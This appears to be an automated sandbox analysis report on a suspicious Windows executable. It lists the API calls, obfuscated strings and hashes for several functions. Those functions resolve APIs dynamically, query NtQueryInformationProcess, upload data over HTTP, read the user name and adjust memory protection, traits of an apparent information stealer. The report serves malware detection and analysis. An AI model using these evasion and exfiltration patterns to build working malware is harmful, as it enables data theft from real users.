The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
API String ID: 2127927946-2218711628
Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E

Function 00419860 Relevance: 75.5, APIs: 33, Strings: 10, Instructions: 212
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00750AB0), ref: 004198A1
GetProcAddress.KERNEL32(75900000,00750C90), ref: 004198BA
GetProcAddress.KERNEL32(75900000,00750BA0), ref: 004198D2
GetProcAddress.KERNEL32(75900000,00750B70), ref: 004198EA
GetProcAddress.KERNEL32(75900000,00750C18), ref: 00419903
GetProcAddress.KERNEL32(75900000,00747988), ref: 0041991B
GetProcAddress.KERNEL32(75900000,007463E0), ref: 00419933
GetProcAddress.KERNEL32(75900000,007465A0), ref: 0041994C
GetProcAddress.KERNEL32(75900000,00750B58), ref: 00419964
GetProcAddress.KERNEL32(75900000,00750BB8), ref: 0041997C
GetProcAddress.KERNEL32(75900000,00750CF0), ref: 00419995
GetProcAddress.KERNEL32(75900000,00750CA8), ref: 004199AD
GetProcAddress.KERNEL32(75900000,00746540), ref: 004199C5
GetProcAddress.KERNEL32(75900000,00750A20), ref: 004199DE
GetProcAddress.KERNEL32(75900000,00750BD0), ref: 004199F6
GetProcAddress.KERNEL32(75900000,00746560), ref: 00419A0E
GetProcAddress.KERNEL32(75900000,00750B88), ref: 00419A27
GetProcAddress.KERNEL32(75900000,00750D08), ref: 00419A3F
GetProcAddress.KERNEL32(75900000,00746580), ref: 00419A57
GetProcAddress.KERNEL32(75900000,00750CC0), ref: 00419A70
GetProcAddress.KERNEL32(75900000,007462E0), ref: 00419A88
LoadLibraryA.KERNEL32(00750A98,?,00416A00), ref: 00419A9A
LoadLibraryA.KERNEL32(00750C00,?,00416A00), ref: 00419AAB
LoadLibraryA.KERNEL32(00750B28,?,00416A00), ref: 00419ABD
LoadLibraryA.KERNEL32(00750CD8,?,00416A00), ref: 00419ACF
LoadLibraryA.KERNEL32(00750A38,?,00416A00), ref: 00419AE0
GetProcAddress.KERNEL32(75070000,00750C30), ref: 00419B02
GetProcAddress.KERNEL32(75FD0000,00750A50), ref: 00419B23
GetProcAddress.KERNEL32(75FD0000,00750A68), ref: 00419B3B
GetProcAddress.KERNEL32(75A50000,00750A80), ref: 00419B5D
GetProcAddress.KERNEL32(74E50000,00746320), ref: 00419B7E
GetProcAddress.KERNEL32(76E80000,007478D8), ref: 00419B9F
GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6

Strings

`et, xrefs: 00419A01
NtQueryInformationProcess, xrefs: 00419BAA
Pu, xrefs: 00419B16
ct, xrefs: 00419B71
bt, xrefs: 00419A7B
hu, xrefs: 00419B2E
ct, xrefs: 00419926
u, xrefs: 004199D0
8u, xrefs: 00419ADA
@et, xrefs: 004199B8

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: u$ ct$8u$@et$NtQueryInformationProcess$Pu$`et$hu$bt$ct
API String ID: 2238633743-236823380
Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12

Function 00404880 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404915
StrCmpCA.SHLWAPI(?,00750148), ref: 0040493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404ABA
lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,",00000000,?,007827F8), ref: 00404DE8
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404E49
InternetCloseHandle.WININET(00000000), ref: 00404EAD
InternetCloseHandle.WININET(00000000), ref: 00404EC5
HttpOpenRequestA.WININET(00000000,00782898,?,007821A8,00000000,00000000,00400100,00000000), ref: 00404B15

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

InternetCloseHandle.WININET(00000000), ref: 00404ECF

Strings

", xrefs: 00404BF2
------, xrefs: 00404B28
", xrefs: 00404D33
------, xrefs: 004049BD
x(x, xrefs: 00404BC9
------, xrefs: 00404C69

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$x(x
API String ID: 2402878923-2129811336
Opcode ID: 3c2921b9cfa0e43a86e82ea6cf66dae86d06e38acf30f905ce2ae364e5791801
Instruction ID: 3f466b8612cc2db17a5d9ea90efc92506b51061f54fe9a8e3d974c375c306076
Opcode Fuzzy Hash: 3c2921b9cfa0e43a86e82ea6cf66dae86d06e38acf30f905ce2ae364e5791801
Instruction Fuzzy Hash: 10124EB1911118AADB14FB91DD92FEEB339AF14314F50419EB10672091DF382F9ACF6A

Function 00417850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction ID: ff9f3fb77af2488786a742b30a7a77c7a6675fe12b7944dcc27658a291e6e945
Opcode Fuzzy Hash: 98be1400a0f13b17dcfec3579e84c662f1c1c1bd9e35413721d24a5daf15813c
Instruction Fuzzy Hash: 08F04FB5D44208AFC710DFD8DD49BAEBBB8EB05711F10025AFA05A2680C77815448BA2

Function 00401160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
ExitProcess.KERNEL32 ref: 0040117E

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction ID: a8b5f4e8781596c88644d8aa2969b9d6e82c50da38cf1cac8898b5ca04c80d98
Opcode Fuzzy Hash: 5e169adc815d3d5e963ffc5450d2c06f987a57c1971b55ed15331b47ed99491e
Instruction Fuzzy Hash: F4D05E7C94030CEBCB14EFE0D9496DDBB79FB0D311F001559ED0572340EA306481CAA6

Function 004026A0 Relevance: 708.9, APIs: 1, Strings: 403, Instructions: 1905
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
Part of subcall function 004045C0: GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
Part of subcall function 004045C0: RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
Part of subcall function 004045C0: strlen.MSVCRT ref: 004046F0
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775

Part of subcall function 004045C0: lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
Part of subcall function 004045C0: VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C

EntryPoint.100F1C346CBCFF15F4D9D75C791000625850E1C82B44C ref: 00403BF9

Strings

CI52N2FDR7VG9MDW, xrefs: 00403325
WA30J1NSE3G1Q6XZQSGR5, xrefs: 004027B8
CEUOYBD1ILSPZQJ9783KXKE, xrefs: 00403406
Q5HV2WZIZDV, xrefs: 0040427A
15TEL3BYS3Y4QRGBV, xrefs: 00402F0B
4N5E5IV5RCK, xrefs: 00403D98
H78NT7O7Y, xrefs: 00403E92
TTCGOYJWP44R8HP9DLJ0X5BSEUS9HI4, xrefs: 0040362C
``t, xrefs: 00402E0A
C0V0, xrefs: 004044A0
J3=Q9, xrefs: 00403E65
E14RI11XSM9G6G73DZ, xrefs: 0040281C
RWJO6A1WPEAZ0B, xrefs: 00402AA6
PUHBJMTFTA2ILNR4MZEJ9HD5, xrefs: 00403884
9QJ862H7, xrefs: 004041B2
77Y0UQ56B20HK3BI9, xrefs: 00404086
6DCRZ3E3PK1GMBPD6P, xrefs: 004032DA
62VZNUR60X1D8W5XHUK, xrefs: 00403370
YPRQ7JHFQ33TPQK, xrefs: 004030FF
H427P3R, xrefs: 0040354B
YQFB51YUXRC, xrefs: 00402C9A
at, xrefs: 0040312A
LUGXGLKZ, xrefs: 0040284E
IE629LXMU27BWVW8N, xrefs: 0040378A
-&!6&*, xrefs: 00403983
;Q"%F>5Poz, xrefs: 00403505
FL5KF7R2Z, xrefs: 00402FBA
Z7DCJ9ICMOA7XH0QG, xrefs: 004037A3
K2UIOJW0HYP3MN3M, xrefs: 00402F24
1EXA771VGH1QY, xrefs: 004029F7
W4KPBJNX1MP, xrefs: 00403C3A
CKJVR71A6GBOYSY84K6ZZBN1ODCCLXKAIDXA88GXYLWDLTG2H3J, xrefs: 00403AAA
L2IJYC7ZLWQ4OTARYPZMNE7FO190509W, xrefs: 00402B3C
LRT990U, xrefs: 00403CE9
A5QPEEXJZY8TD8GZ, xrefs: 00402F6F
NNSYKO, xrefs: 0040397E
:8! =#J, xrefs: 00403618
V5C0W8LAN7H0B2C3I6OX1ALZ, xrefs: 00404342
D1PKYAL672EQNO9GEHPXUC, xrefs: 00403FD7
8J799TR2BTKM4, xrefs: 00402A74
PI8MIA9N0G9PN, xrefs: 0040309B
35<+ld, xrefs: 004036C7
WY&]>, xrefs: 00403F91
QJKXUZ3X9AF91T87UQV, xrefs: 0040314A
GS6933LDM1IDNGGC7NXW, xrefs: 00403933
FV4FQ5SFOV6X8, xrefs: 00402F56
kf*)., xrefs: 00403F78
N/YQ('#j0&+, xrefs: 00402C86
ZTS8RVY9HUX7, xrefs: 00402E8E
et, xrefs: 0040282E
228CFBMEZZ, xrefs: 00403C9E
T0KEGT66VO3I, xrefs: 00403D02
@_t, xrefs: 00402F81
YS19LGZX9L4NXDL5TCAXMYMHJHRWSZTDOLFSTJ8DOGJOYA0TTMQRM5U9GU0EYCFJ108M73MJD7JFP7SIQ7DFJC1T0, xrefs: 00404135
XYY6OLZ6I3YWEN017SCF4QXCWV0R, xrefs: 00402ED9
WNXUKG7A3C, xrefs: 00403D34
XZUG30H53NO, xrefs: 00403DB1
IV4O64EJHPHUROD1, xrefs: 00403037
2K04W, xrefs: 004040D1
LW8X21WBTTV, xrefs: 004028FD
2MAGY9WR9, xrefs: 0040328F
R1925G, xrefs: 004036A9
RY6ZI8M92P9SG, xrefs: 00403EF6
`'x, xrefs: 004041DD
9C5KXVC9KY58, xrefs: 004032A8
7R9DX6G04, xrefs: 00402B6E
H8GP, xrefs: 004044EB
80H5D46CH4UX3TZXNU3, xrefs: 00402B87
GR9OBRL7CRQA4SPD2US, xrefs: 00402C1D
WB05146J, xrefs: 004041E4
L64, xrefs: 00403A46
ZM59OW3RYZ45Y5F2PX, xrefs: 004030CD
7W13NN4COVD7SQ2W, xrefs: 00402C04
6'*ia/ T, xrefs: 00403DE8
YPM2ZJN078OS4Y456TC, xrefs: 0040440A
'*'%/Z<, xrefs: 004026CD
IN7HZL8ZOTQSD092, xrefs: 00403131
!Z%(+%J, xrefs: 004039B5
&7!;JW$j, xrefs: 004034A1
RZLN85DZNQFV6O, xrefs: 0040325D
MVZFH, xrefs: 0040451D
893OVROOTYR3C, xrefs: 00403389
RDQES9N1C6T2RP5MGGBGM, xrefs: 00402FEC
I932E8053QCPA, xrefs: 00403069
GRJVWGBSFWGMV, xrefs: 00403163
T2LJO2A, xrefs: 0040386B
A6CM23RTLW7, xrefs: 00402CB3
AEXC25X6H, xrefs: 00403EC4
NOIR9N6, xrefs: 00404568
XDTG8BCEJ62SD18V7USVT, xrefs: 00402DF8
ET3GL1QH, xrefs: 00403C6C
S6REQ7J1IILDZ8O76VY, xrefs: 00403276
t@?., xrefs: 00403582
_t, xrefs: 00403049
J3YO9GW7OQAW1VROWW66, xrefs: 00402E43
I2J13B82NCX4, xrefs: 00403C85
x'x, xrefs: 00403F6C
0SC8RVYMTA5UAU623L6C, xrefs: 00403244
UA58PAYB4YGZ18KHSAZ8Q8OQ1DULX6K2LTRK4V, xrefs: 004044D2
A0JE62LBE7OJOI8XTV34ANNAJII2SWGG50CSNC89VOZTFGLGDQIDBLYXMJ5YTSSS1IOYFQKQX4JVY44C6CYCNCETBPFEHKPC6G172XAXG2QHCD8SO31R, xrefs: 00403596
EUNV5MZFG2BM5I, xrefs: 00402E75
73TBV20KN6WESPP, xrefs: 00403D7F
`at, xrefs: 004030DF
USPKSEDQOH9Y, xrefs: 00402D17
8F8IJ3YE, xrefs: 004033D4
DFLVWPGMP, xrefs: 00404536
8FS0J, xrefs: 00403E60
IMT57S0030X7O7QK0EYILKRI9FO8SGBUWFM8N8D1CJ52ZL, xrefs: 00403A78
XR2UQXQRN9C84VSD, xrefs: 00402E11
VZLJ47B1X, xrefs: 00402C4F
=/*31%; 8$i!*., xrefs: 0040459F
20QDC4GFKPUT, xrefs: 004032C1
NQ53KAT5LF4MQU, xrefs: 00404374
6ZMIOY1T84DYH, xrefs: 00403758
VDR1229WNH, xrefs: 00403B0E
ISUEL6F9, xrefs: 00402A8D
V3IPFEF1K, xrefs: 00402B0A
